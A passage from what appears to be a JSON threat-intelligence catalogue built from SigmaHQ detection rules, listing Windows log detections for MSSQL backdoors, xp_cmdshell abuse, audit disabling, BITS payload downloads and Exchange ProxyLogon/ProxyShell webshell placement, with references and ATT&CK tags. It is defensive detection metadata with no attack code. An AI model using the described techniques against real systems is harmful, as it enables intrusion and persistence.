"attack.execution", + "attack.t1218", + "attack.t1218.007" + ], + "creation_date": "2022/10/23", + "filename": "win_msi_install_from_web.yml", + "author": "Stamatis Chatzimangou", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "uuid": "08200f85-2678-463e-9c32-88dce2f073d1", + "value": "MSSQL Add Account To Sysadmin Role", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/13", + "filename": "win_mssql_add_sysadmin_account.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Rare legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "uuid": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "value": "MSSQL Disable Audit Settings", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16", + "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/07/13", + "filename": "win_mssql_disable_audit_settings.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "uuid": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", + "value": "MSSQL Extended Stored Procedure Backdoor Maggie", + "meta": { + "refs": [ + "https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_maggie.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546" + ], + "creation_date": "2022/10/09", + "filename": "win_mssql_sp_maggie.yml", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "level": "high", + "falsepositive": [ + "Legitimate extended stored procedures named maggie" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "uuid": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "value": "MSSQL SPProcoption Set", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_sp_procoption_set.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/13", + "filename": "win_mssql_sp_procoption_set.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate use of the feature by administrators (rare)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "uuid": "7f103213-a04e-4d59-8261-213dddf22314", + "value": "MSSQL XPCmdshell Suspicious Execution", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/12", + "filename": "win_mssql_xp_cmdshell_audit_log.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "uuid": "d08dd86f-681e-4a00-a92c-1db218754417", + "value": "MSSQL XPCmdshell Option Change", + "meta": { + "refs": [ + "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/", + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/07/12", + "filename": "win_mssql_xp_cmdshell_change.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "uuid": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "value": "Atera Agent Installation", + "meta": { + "refs": [ + "https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_software_atera_rmm_agent_install.yml" + ], + "tags": [ + "attack.t1219" + ], + "creation_date": "2021/09/01", + "filename": "win_software_atera_rmm_agent_install.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Legitimate Atera agent installation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects backup catalog deletions", + "uuid": "9703792d-fd9a-456d-a672-ff92efe4806a", + "value": "Backup Catalog Deleted", + "meta": { + "refs": [ + "https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx", + "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_backup_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2017/05/12", + "filename": "win_susp_backup_delete.yml", + "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "uuid": "6c82cf5c-090d-4d57-9188-533577631108", + "value": "Microsoft Malware Protection Engine Crash", + "meta": { + "refs": [ + "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5", + "https://technet.microsoft.com/en-us/library/security/4022344", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1211", + "attack.t1562.001" + ], + "creation_date": "2017/05/09", + "filename": "win_susp_msmpeng_crash.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "MsMpEng.exe can crash when C:\\ is full" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "uuid": "d6266bf5-935e-4661-b477-78772735a7cb", + "value": "CVE-2020-0688 Exploitation via Eventlog", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", + "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2020/02/29", + "filename": "win_vul_cve_2020_0688.yml", + "author": "Florian Roth, wagga", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "uuid": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", + "value": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "meta": { + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2021_41379.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ], + "creation_date": "2021/11/22", + "filename": "win_vul_cve_2021_41379.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other MSI packages for which your admins have used that name" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", + "value": "File Was Not Allowed To Run", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", + "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" + ], + "creation_date": "2020/06/28", + "filename": "win_applocker_file_was_not_allowed_to_run.yml", + "author": "Pushkarev Dmitry", + "level": "medium", + "falsepositive": [ + "Need tuning applocker or add exceptions in SIEM" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "uuid": "d635249d-86b5-4dad-a8c7-d7272b788586", + "value": "Suspicious Download with BITS from Suspicious TLD", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/06/28", + "filename": "win_bits_client_susp_domain.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "uuid": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", + "value": "Suspicious Download File Extension with BITS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/03/01", + "filename": "win_bits_client_susp_local_file.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "uuid": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "value": "Download with BITS to Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_local_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/06/28", + "filename": "win_bits_client_susp_local_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "uuid": "fe3a2d49-f255-4d10-935c-bda7391108eb", + "value": "Suspicious Task Added by Powershell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_powershell_job.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/03/01", + "filename": "win_bits_client_susp_powershell_job.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", + "uuid": "1ff315dc-2a3a-4b71-8dde-873818d25d39", + "value": "Suspicious Task Added by Bitsadmin", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/03/01", + "filename": "win_bits_client_susp_use_bitsadmin.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Administrator PowerShell scripts" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", + "uuid": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", + "value": "Suspicious Uncommon Download with BITS from Suspicious TLD", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md", + "https://twitter.com/malmoeb/status/1535142803075960832", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" + ], + "creation_date": "2022/06/10", + "filename": "win_bits_client_uncommon_domain.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Other legitimate domains used by software updaters" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. It often means the file's signature is revoked or expired", + "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "value": "Code Integrity Attempted DLL Load", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1483810148602814466", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/01/20", + "filename": "win_codeintegrity_attempted_dll_load.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Antivirus products" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects blocked load attempts of revoked drivers", + "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "value": "Block Load Of Revoked Driver", + "meta": { + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/11/10", + "filename": "win_codeintegrity_revoked_driver.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", + "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "value": "Code Integrity Blocked Driver Load", + "meta": { + "refs": [ + "https://twitter.com/wdormann/status/1590434950335320065", + "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintergiry_blocked_driver_load.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/11/10", + "filename": "win_codeintergiry_blocked_driver_load.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability", + "uuid": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "value": "Loading Diagcab Package From Remote Path", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1539679555908141061", + "https://twitter.com/j00sean/status/1537750439701225472", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/14", + "filename": "win_diagnosis_scripted_load_remote_diagcab.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate package hosted on a known and authorized remote location" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "value": "GALLIUM Artefacts - Builtin", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2020/02/07", + "filename": "win_apt_gallium.yml", + "author": "Tim Burrell", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", + "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "meta": { + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", + "https://twitter.com/gentilkiwi/status/861641945944391680", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_susp_dns_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2017/05/08", + "filename": "win_susp_dns_config.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects plugged USB devices", + "uuid": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", + "value": "USB Device Plugged", + "meta": { + "refs": [ + "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/", + "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1200" + ], + "creation_date": "2017/11/09", + "filename": "win_usb_device_plugged.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "A rule has been modified in the Windows Firewall exception list", + "uuid": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "value": "Added Rule in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_add_rule.yml", + "author": "frack113", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "A rule has been modified in the Windows Firewall exception list", + "uuid": "5570c4d9-8fdd-4622-965b-403a5a101aa0", + "value": "Modified Rule in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_change_rule.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_change_rule.yml", + "author": "frack113", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "A rule has been deleted in the Windows Firewall exception list.", + "uuid": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", + "value": "Delete Rule in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_delete_rule.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_delete_rule.yml", + "author": "frack113", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "The Windows Firewall service failed to load Group Policy.", + "uuid": "7ec15688-fd24-4177-ba43-1a950537ee39", + "value": "Failed to Load Policy in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_failed.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_failed.yml", + "author": "frack113", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Windows Firewall has been reset to its default configuration.", + "uuid": "04b60639-39c0-412a-9fbe-e82499c881a3", + "value": "Reset to Default Configuration Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_reset.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_reset.yml", + "author": "frack113", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Setting have been change in Windows Firewall", + "uuid": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", + "value": "Setting Change in Windows Firewall with Advanced Security", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/firewall_as/win_firewall_as_setting_change.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "win_firewall_as_setting_change.yml", + "author": "frack113", + "level": "low", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible Active Directory enumeration via LDAP", + "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", + "value": "LDAP Reconnaissance / Active Directory Enumeration", + "meta": { + "refs": [ + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", + "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002", + "attack.t1087.002", + "attack.t1482" + ], + "creation_date": "2021/06/22", + "filename": "win_ldap_recon.yml", + "author": "Adeem Mawani", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "value": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_cve_2021_42321.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210" + ], + "creation_date": "2021/11/18", + "filename": "win_exchange_cve_2021_42321.yml", + "author": "Florian Roth, @testanull", + "level": "high", + "falsepositive": [ + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory", + "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", + "value": "ProxyLogon MSExchange OabVirtualDirectory", + "meta": { + "refs": [ + "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml" + ], + "tags": [ + "attack.t1587.001", + "attack.resource_development" + ], + "creation_date": "2021/08/09", + "filename": "win_exchange_proxylogon_oabvirtualdir.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell", + "uuid": "b7bc7038-638b-4ffd-880c-292c692209ef", + "value": "Certificate Request Export to Exchange Webserver", + "meta": { + "refs": [ + "https://twitter.com/GossiTheDog/status/1429175908905127938", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/08/23", + "filename": "win_exchange_proxyshell_certificate_generation.yml", + "author": "Max Altgelt", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it", + "uuid": "516376b4-05cd-4122-bae0-ad7641c38d48", + "value": "Mailbox Export to Exchange Webserver", + "meta": { + "refs": [ + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/08/09", + "filename": "win_exchange_proxyshell_mailbox_export.yml", + "author": "Florian Roth, Rich Warren, Christian Burkard", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell 